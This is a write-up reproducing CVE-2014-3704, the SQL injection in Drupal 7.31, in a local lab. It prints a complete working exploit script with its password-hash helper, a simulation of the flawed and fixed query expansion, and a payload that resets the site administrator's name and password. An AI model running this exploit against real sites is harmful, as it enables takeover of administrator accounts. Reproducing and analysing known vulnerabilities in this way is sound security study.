[cve-2014-3704] Drupal 7.31 SQL Injection Vulnerability Analysis and replication

Source: Internet
Author: User
Tags: ord rehash drupal cve

This is not a new vulnerability; what follows is a record of my own reproduction. Affected versions:

Drupal 7.x before 7.32 (reproduced here on 7.31). The 7.32 fix changes expandArguments() in includes/database/database.inc to number the expanded placeholders with array_values() instead of using the caller-supplied array keys.

Drupal is an open source content management platform that provides support for millions of websites and applications.

It is built, used and supported by an active and diverse community around the world.

0x01 Vulnerability Reproduction

Reproduction environment:

1) Apache 2.4

2) PHP 7.0 (Drupal 7.31 predates official PHP 7 support, which only arrived in Drupal 7.50, so expect some warnings)

3) Drupal 7.31 https://www.drupal.org/drupal-7.31-release-notes (download from the release notes page)

Unpack the release archive into the web root and run the installer.

Problem encountered along the way:

Workaround: disable extension=php_mbstring.dll in php.ini (back up php.ini before editing). Be aware that the exploit script below decides success by looking for an mb_strlen() warning in the response; Drupal's drupal_strlen() only calls mb_strlen() when the mbstring extension is loaded, so with mbstring disabled the injected UPDATE can run without the script ever printing "Success!". Check the users table instead.

Exploit:

Original administrator account: root, password: rootxxxx

The public PoC script together with the drupalpass.py helper it imports:

# drupal7_sqli.py -- public PoC for CVE-2014-3704, reflowed and ported from Python 2 to Python 3.
# The original argv check compared against 3 and never exited; it is fixed here.
import sys
from urllib.request import urlopen

from drupalpass import DrupalHash  # the helper class reproduced below, saved as drupalpass.py

if len(sys.argv) != 4:
    print("usage: drupal7_sqli.py host username password")
    print("       drupal7_sqli.py http://nope.io admin wowsecure")
    sys.exit(1)

host, user, password = sys.argv[1:4]

# Any valid Drupal 7 hash works here: only its setting prefix ($S$ + cost character + 8-char salt)
# is reused, and the supplied password is rehashed under that salt.
new_hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
if not new_hash:
    sys.exit("could not compute a Drupal 7 hash")

target = "%s/?q=node&destination=node" % host
# The array key of name[...] is copied verbatim into the SQL by expandArguments();
# name[0]=larry supplies the value that PDO binds to the :name_0 placeholder.
# Drupal stores only the first 55 characters of a hash, hence new_hash[:55].
post_data = ("name[0%20;update+users+set+name%3d'" + user + "'+,+pass+%3d+'" + new_hash[:55]
             + "'+where+uid+%3d+'1';;#%20%20]=bob"
             "&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=log+in")
content = urlopen(target, data=post_data.encode()).read().decode(errors="replace")
# The warning comes from drupal_strlen() choking on the array-valued name field.
if "mb_strlen() expects parameter 1" in content:
    print("Success!\nLogin now with user:%s and pass:%s" % (user, password))


# drupalpass.py -- Drupal 7 compatible password hashing (ported to Python 3; digests are bytes).
import hashlib

# Calculate a non-truncated Drupal 7 compatible password hash.
# The consumer of these hashes must truncate correctly (Drupal keeps 55 characters).
class DrupalHash:
    def __init__(self, stored_hash, password):
        self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
        self.last_hash = self.rehash(stored_hash, password)

    def get_hash(self):
        return self.last_hash

    def password_get_count_log2(self, setting):
        # The 4th character of the setting encodes log2 of the iteration count.
        return self.itoa64.index(setting[3])

    def password_crypt(self, algo, password, setting):
        setting = setting[0:12]  # '$X$' + count character + 8-character salt
        if setting[0] != '$' or setting[2] != '$':
            return False
        count_log2 = self.password_get_count_log2(setting)
        salt = setting[4:12]
        if len(salt) < 8:
            return False
        count = 1 << count_log2
        if algo == 'md5':
            hash_func = hashlib.md5
        elif algo == 'sha512':
            hash_func = hashlib.sha512
        else:
            return False
        pw = password.encode()
        hash_str = hash_func(salt.encode() + pw).digest()
        for c in range(count):
            hash_str = hash_func(hash_str + pw).digest()
        return setting + self.custom64(hash_str)

    def custom64(self, data, count=0):
        # phpass-style base64 used by Drupal's _password_base64_encode().
        if count == 0:
            count = len(data)
        output = ''
        i = 0
        itoa64 = self.itoa64
        while True:
            value = data[i]
            i += 1
            output += itoa64[value & 0x3f]
            if i < count:
                value |= data[i] << 8
            output += itoa64[(value >> 6) & 0x3f]
            if i >= count:
                break
            i += 1
            if i < count:
                value |= data[i] << 16
            output += itoa64[(value >> 12) & 0x3f]
            if i >= count:
                break
            i += 1
            output += itoa64[(value >> 18) & 0x3f]
            if i >= count:
                break
        return output

    def rehash(self, stored_hash, password):
        # Drupal 6 compatibility: a bare 32-character md5.
        if len(stored_hash) == 32 and stored_hash.find('$') == -1:
            return hashlib.md5(password.encode()).hexdigest()
        # Drupal 7: a hash migrated from Drupal 6 carries a 'U' prefix and the password is md5'd first.
        if stored_hash[0:2] == 'U$':
            stored_hash = stored_hash[1:]
            password = hashlib.md5(password.encode()).hexdigest()
        hash_type = stored_hash[0:3]
        if hash_type == '$S$':
            hash_str = self.password_crypt('sha512', password, stored_hash)
        elif hash_type == '$H$' or hash_type == '$P$':
            hash_str = self.password_crypt('md5', password, stored_hash)
        else:
            hash_str = False
        return hash_str

I did not run the script here.

http://127.0.0.1/drupal-7.31/node?destination=node

Click "Log in" on this page, intercept the POST, and modify the request so that the login query carries an injected UPDATE statement, which rewrites the administrator account's password directly.
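To make concrete what the modified login POST does inside Drupal, here is an added example (not code from the original page or from the Drupal project) that simulates DatabaseConnection::expandArguments() from includes/database/database.inc in its 7.31 and 7.32 forms and runs both over a constructed login body of the same shape as the PoC's. The login query string, the body, the stand-in hash value '$S$NEWHASH' and the function names are assumptions made for this example.

```python
"""Added example: simulate how Drupal 7's DatabaseConnection::expandArguments()
rewrites the login query for an array-valued name[] parameter, before (7.31)
and after (7.32) the fix.  Not code from the original page or from Drupal."""
import re
from urllib.parse import unquote_plus

# Query issued by user_login_authenticate_validate() in Drupal 7.31 (assumed here).
LOGIN_QUERY = "SELECT * FROM {users} WHERE name = :name AND status = 1"

# Constructed POST body with the same shape as the PoC's post_data.  '$S$NEWHASH'
# stands in for a real Drupal hash; the trailing '#  ' comments out the rest of the line.
POST_BODY = (
    "name[0%20;update+users+set+name%3d'admin',pass%3d'$S$NEWHASH'"
    "+where+uid%3d'1';#%20%20]=bob"
    "&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=log+in"
)


def php_parse_body(body):
    """Decode a urlencoded body the way PHP fills $_POST: name[key]=value becomes
    a nested array, and the text inside the brackets is kept verbatim (spaces,
    quotes and semicolons included)."""
    post = {}
    for pair in body.split("&"):
        raw_key, _, raw_value = pair.partition("=")
        key, value = unquote_plus(raw_key), unquote_plus(raw_value)
        m = re.fullmatch(r"([^\[]+)\[(.*)\]", key, re.S)
        if m:
            post.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            post[key] = value
    return post


def expand_arguments(query, args, fixed):
    """Port of expandArguments(): each array-valued placeholder :key is replaced by
    a comma-separated list of :key_<i> placeholders.  7.31 took <i> from the
    array KEYS (attacker-controlled); 7.32 applies array_values() first, so <i>
    is always 0, 1, 2, ..."""
    args = dict(args)
    for key, data in [(k, v) for k, v in args.items() if isinstance(v, dict)]:
        items = enumerate(data.values()) if fixed else data.items()
        new_keys = {"%s_%s" % (key, i): value for i, value in items}
        # preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query)
        query = re.sub(re.escape(key) + r"\b", lambda m: ", ".join(new_keys), query)
        del args[key]
        args.update(new_keys)
    return query, args


def expand_login_query(body, fixed):
    """Run the login body through the 7.31 (fixed=False) or 7.32 (fixed=True) logic."""
    post = php_parse_body(body)
    return expand_arguments(LOGIN_QUERY, {":name": post["name"]}, fixed)


def placeholder_tokens(query):
    """Placeholders as PDO's emulated prepare sees them: ':' followed by word
    characters, so everything after ':name_0 ' is literal SQL."""
    return re.findall(r":\w+", query)


if __name__ == "__main__":
    for fixed in (False, True):
        query, args = expand_login_query(POST_BODY, fixed)
        print("7.32 fixed" if fixed else "7.31 vulnerable")
        print("  SQL   :", query)
        print("  args  :", args)
        print("  tokens:", placeholder_tokens(query))
```

With the 7.31 logic the key of the first name[] entry lands unchanged in the SQL after `:name_0`, the `#` comments out the rest of the original statement, and the two `:name_0` tokens match the two bound values, which is why the PoC sends the second name[0]=larry entry. With the 7.32 logic the same body only yields `name = :name_0, :name_1`, a malformed comparison that fails as a query error instead of executing attacker SQL.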

For the hash, run Drupal's own scripts/password-hash.sh from the Drupal root (php scripts/password-hash.sh <password>) to generate a hash for the password you want to set.

This produced an error for me, so I used two publicly posted hashes for the UPDATE instead:

$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAzld ----> thanks

$S$CTo9G7Lx2MJRSYWMLH3NRTXL6AWJT35FZEP9OBYJKWEZMHOGQF.S ----> [email protected]

(Drupal hashes are case-sensitive. The second hash lost its letter case when this page was copied; only the $S$CTo9G7Lx2 setting prefix is certain, so regenerate the hash for your own password rather than pasting this one.)

Payload:

Update the user directly: user name owned, password [email protected].

Querying the database afterwards, or watching MySQL, shows that the administrator's user name and password have been reset: the uid 1 account is now named owned and its password is [email protected].

Ref

    • http://0day5.com/archives/2310/
    • http://www.freebuf.com/vuls/47690.html
